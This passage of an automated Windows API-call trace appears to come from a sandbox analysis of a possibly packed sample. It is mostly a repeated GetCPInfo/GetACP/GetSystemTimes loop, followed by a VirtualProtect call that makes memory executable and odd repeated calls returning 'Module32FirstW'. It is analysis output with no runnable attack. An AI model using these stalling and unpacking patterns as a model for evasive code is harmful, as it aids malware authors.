| out: lpCPInfo=0x18fa80) returned 1 [0080.027] GetACP () returned 0x4e4 [0080.027] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.027] GetACP () returned 0x4e4 [0080.027] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.027] GetACP () returned 0x4e4 [0080.027] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.027] GetACP () returned 0x4e4 [0080.027] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.028] GetACP () returned 0x4e4 [0080.028] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.028] GetACP () returned 0x4e4 [0080.028] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.028] GetACP () returned 0x4e4 [0080.028] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.028] GetACP () returned 0x4e4 [0080.028] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.028] GetACP () returned 0x4e4 [0080.028] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.029] GetACP () returned 0x4e4 [0080.029] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.029] GetACP () returned 0x4e4 [0080.029] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.029] GetACP () returned 0x4e4 [0080.029] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.029] GetACP () returned 0x4e4 [0080.029] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.029] GetACP () returned 0x4e4 [0080.029] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.030] GetACP () returned 0x4e4 [0080.030] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.030] GetACP () returned 0x4e4 [0080.030] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.030] GetACP () returned 0x4e4 [0080.030] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.030] GetACP () returned 0x4e4 [0080.030] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.030] GetACP () returned 0x4e4 [0080.030] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.030] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.031] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.031] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.031] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.031] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.031] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.031] GetACP () returned 0x4e4 [0080.031] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.032] GetACP () returned 0x4e4 [0080.032] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.032] GetACP () returned 0x4e4 [0080.032] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.032] GetACP () returned 0x4e4 [0080.032] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.032] GetACP () returned 0x4e4 [0080.032] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.032] GetACP () returned 0x4e4 [0080.032] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.032] GetACP () returned 0x4e4 [0080.032] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.033] GetACP () returned 0x4e4 [0080.033] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.034] GetACP () returned 0x4e4 [0080.034] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.034] GetACP () returned 0x4e4 [0080.034] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.034] GetACP () returned 0x4e4 [0080.034] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.034] GetACP () returned 0x4e4 [0080.034] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.034] GetACP () returned 0x4e4 [0080.034] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.034] GetACP () returned 0x4e4 [0080.035] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.035] GetACP () returned 0x4e4 [0080.035] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.035] GetACP () returned 0x4e4 [0080.035] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.035] GetACP () returned 0x4e4 [0080.035] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.036] GetACP () returned 0x4e4 [0080.036] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.036] GetACP () returned 0x4e4 [0080.036] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.036] GetACP () returned 0x4e4 [0080.037] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.037] GetACP () returned 0x4e4 [0080.037] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.037] GetACP () returned 0x4e4 [0080.037] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.037] GetACP () returned 0x4e4 [0080.037] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.037] GetACP () returned 0x4e4 [0080.037] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.038] GetACP () returned 0x4e4 [0080.038] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.038] GetACP () returned 0x4e4 [0080.038] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.038] GetACP () returned 0x4e4 [0080.038] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.038] GetACP () returned 0x4e4 [0080.038] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.038] GetACP () returned 0x4e4 [0080.039] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.039] GetACP () returned 0x4e4 [0080.039] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.039] GetACP () returned 0x4e4 [0080.039] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.039] GetACP () returned 0x4e4 [0080.040] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.040] GetACP () returned 0x4e4 [0080.040] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.040] GetACP () returned 0x4e4 [0080.040] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.040] GetACP () returned 0x4e4 [0080.041] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.041] GetACP () returned 0x4e4 [0080.041] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.041] GetACP () returned 0x4e4 [0080.041] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.041] GetACP () returned 0x4e4 [0080.041] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.041] GetACP () returned 0x4e4 [0080.041] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.041] GetACP () returned 0x4e4 [0080.042] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.042] GetACP () returned 0x4e4 [0080.042] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.042] GetACP () returned 0x4e4 [0080.491] VirtualProtect (in: lpAddress=0x595ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0080.492] AddAtomA (lpString=0x0) returned 0x0 [0080.492] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.492] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.492] AddAtomA (lpString=0x0) returned 0x0 [0080.493] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.493] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.493] AddAtomA (lpString=0x0) returned 0x0 [0080.493] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.493] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.493] AddAtomA (lpString=0x0) returned 0x0 [0080.493] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.493] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 